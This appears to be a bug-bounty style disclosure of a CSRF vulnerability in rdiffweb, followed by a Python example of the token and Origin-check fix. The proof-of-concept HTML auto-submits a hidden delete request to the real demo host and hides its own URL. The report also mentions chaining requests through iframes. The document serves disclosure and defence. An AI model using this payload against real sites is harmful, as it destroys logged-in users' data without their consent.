Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
Sep 11th 2021
Hello dear Rdiffweb team.
I found a CSRF vulnerability on the following endpoint that lets attackers delete repository history with PoC.html.
🕵️♂️ Proof of Concept
1. A user with the right privileges should be logged in with Firefox or Safari.
2. The user goes to a website that contains PoC.html.
3. After visiting the attacker's website, a repo history with the name test-encoding will be deleted.
```html
<html>
  <body>
    <!-- Replace the visible URL so the PoC page path does not show in the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the delete endpoint; the browser attaches the logged-in user's cookies -->
    <form action="https://rdiffweb-demo.ikus-soft.com/delete/admin/testcases" method="POST">
      <input type="hidden" name="confirm" value="testcases" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Auto-submit: document.forms is a collection, so the first form must be indexed -->
    <script>document.forms[0].submit();</script>
  </body>
</html>
```
Also, an attacker can send multiple requests with the help of iframes.
I just want to suggest that you set a CSRF token for this form.
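To show what the suggested fix looks like on the server side, here is an added example (not rdiffweb's own code, and not tied to its web framework) of a synchronizer token for the delete form, plus an Origin/Referer check as defence in depth. The handler `handle_delete`, the session dictionary, and the hostname `attacker.invalid` are constructed for the example; the site origin is taken from the PoC above. Running `demo()` pushes one forged request, shaped like the PoC's auto-submitted form, and one legitimate request through the handler and returns the status of each.

```python
import hmac
import secrets
from typing import Dict, Mapping, Optional, Tuple
from urllib.parse import urlsplit

# Constructed for this example: the site's own origin (from the PoC above).
# A real deployment would take it from configuration.
SITE_ORIGIN = "https://rdiffweb-demo.ikus-soft.com"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Return the session's CSRF token, minting a random one on first use.

    The token is rendered into every state-changing form as a hidden field.
    A cross-site page cannot read it, so a forged POST cannot include it.
    """
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_token_valid(session: Mapping[str, str], submitted: Optional[str]) -> bool:
    """Compare the submitted token against the session's in constant time."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def origin_allowed(headers: Mapping[str, str], site_origin: str = SITE_ORIGIN) -> bool:
    """Defence in depth: reject a POST whose Origin (or Referer) is another site.

    Browsers send Origin on cross-site form posts. If neither header is present
    the request falls through to the token check instead of being rejected,
    because some privacy settings strip Referer on same-site navigations.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return True
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == site_origin


def handle_delete(session: Mapping[str, str], headers: Mapping[str, str],
                  form: Mapping[str, str], repo: str) -> Tuple[int, str]:
    """Hypothetical POST /delete/<user>/<repo> handler with CSRF protection.

    Returns an (HTTP status, message) pair instead of touching a real backend.
    """
    if not origin_allowed(headers):
        return 403, "cross-site request rejected by origin check"
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    if form.get("confirm") != repo:
        return 400, "confirmation text does not match repository name"
    return 200, f"repository {repo} deleted"


def demo() -> Tuple[Tuple[int, str], Tuple[int, str]]:
    """Run one forged and one legitimate delete through the handler."""
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)

    # Constructed: what the browser sends when the PoC page auto-submits its
    # form. The session cookie rides along, but the form carries no token and
    # the browser sets Origin to the attacker's page.
    forged = handle_delete(
        session,
        {"Origin": "https://attacker.invalid"},
        {"confirm": "testcases"},
        repo="testcases",
    )

    # Constructed: the same delete submitted from the site's own form, which
    # embeds the hidden csrf_token field.
    legitimate = handle_delete(
        session,
        {"Origin": SITE_ORIGIN},
        {"confirm": "testcases", "csrf_token": token},
        repo="testcases",
    )
    return forged, legitimate


if __name__ == "__main__":
    print(demo())
```

The token check is the actual fix; the origin check only narrows the window further (and catches requests from browsers that send Origin but where a template forgot to include the hidden field). Both checks must run before any state changes, and the token must be compared with `hmac.compare_digest` rather than `==` so that timing differences do not leak it.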